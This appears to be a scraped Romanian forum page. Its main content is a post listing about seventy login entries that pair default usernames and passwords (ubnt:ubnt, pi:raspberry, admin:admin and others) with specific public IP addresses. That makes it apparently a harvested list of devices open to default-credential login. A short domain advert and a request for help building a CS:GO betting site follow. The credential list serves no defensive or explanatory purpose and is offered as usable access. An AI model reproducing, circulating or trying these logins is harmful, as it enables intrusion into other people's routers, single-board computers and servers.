ubnt:ubnt:24.246.149.229 pi:raspberry:24.232.131.53 ubnt:ubnt:24.244.139.128 ubnt:ubnt:24.244.163.233 ubnt:ubnt:24.247.198.245 ubnt:ubnt:24.26.241.41 ubnt:ubnt:24.253.125.229 ubnt:ubnt:68.103.53.226 ubnt:ubnt:68.1.76.254 ubnt:ubnt:68.105.153.153 ubnt:ubnt:68.11.80.33 ubnt:ubnt:68.108.126.212 ubnt:ubnt:68.118.100.47 ubnt:ubnt:68.108.250.133 ubnt:ubnt:68.113.18.54 ubnt:ubnt:68.111.229.165 pi:raspberry:68.115.126.102 pi:raspberry:68.100.58.19 ubnt:ubnt:68.119.232.176 ubnt:ubnt:68.105.210.63 pi:raspberry:68.115.34.204 ubnt:ubnt:68.171.67.91 ubnt:ubnt:68.119.32.221 pi:raspberry:68.104.219.84 ubnt:ubnt:68.185.182.250 ubnt:ubnt:68.184.161.253 ubnt:ubnt:68.187.240.133 ubnt:ubnt:68.183.39.13 ubnt:ubnt:68.186.20.220 ubnt:ubnt:68.189.108.187 ubnt:ubnt:68.189.72.8 ubnt:ubnt:68.188.212.79 ubnt:ubnt:68.206.161.38 ubnt:ubnt:68.206.139.79 ubnt:ubnt:68.205.144.115 pi:raspberry:68.193.146.64 ubnt:ubnt:68.186.64.126 ubnt:ubnt:68.196.139.103 ubnt:ubnt:68.195.8.39 ubnt:ubnt:68.196.167.95 pi:raspberry:68.196.127.48 ubnt:ubnt:68.224.218.189 ubnt:ubnt:68.225.255.216 ubnt:ubnt:68.226.248.19 ubnt:ubnt:68.228.158.205 ubnt:ubnt:68.234.213.230 ubnt:ubnt:68.231.199.2 ubnt:ubnt:68.226.211.232 ubnt:ubnt:68.183.23.180 pi:raspberry:68.234.134.226 ubnt:ubnt:68.228.70.235 ubnt:ubnt:68.235.77.77 ubnt:ubnt:68.229.132.246 pi:raspberry:68.236.123.11 ubnt:ubnt:96.18.160.245 ubnt:ubnt:96.244.254.53 ubnt:ubnt:96.232.96.58 ubnt:ubnt:96.254.165.200 ubnt:ubnt:96.28.152.6 user:user:24.111.203.187 user:user:24.111.200.66 user:user:24.108.63.140 user:user:24.111.205.179 user:user:24.111.218.36 user:user:24.111.164.160 ftpuser:asteriskftp:24.118.83.216 admin:admin:24.114.222.53 admin:admin:24.123.208.82 admin:admin:24.121.26.243 user:user:24.111.218.164
    1 point
  16. Domenii .com & .net la numai 0.29Euro / primul an https://www.hostalia.com/
    -1 points
  17. Buna seara ! Va rog sa ma scuzati daca nu am postat unde trebuie dar sunt nou pe acest forum. Dupa cum spune si titlul caut si eu pe cineva care ma poate ajuta sa fac un Site de Betting Cs:Go . Eu am urmatoarele : 2 domenii .com Vps Si niste scripturi (Ruleta/jackpot/Coinflip mai multe) Si am nevoie de cineva cu exprienta sa ma ajuta sa il pun pe picioare. Cel care ma ajuta o sa primeasca Iteme/Credite(pe site)/Sau bani (paypal) dupa ce imi vin ceva jucatori sa strang niste bani sa ii dau respectivei persoane. Multumesc anticipat!
    -2 points
This leaderboard is set to Bucharest/GMT+02:00
×
×
  • Create New...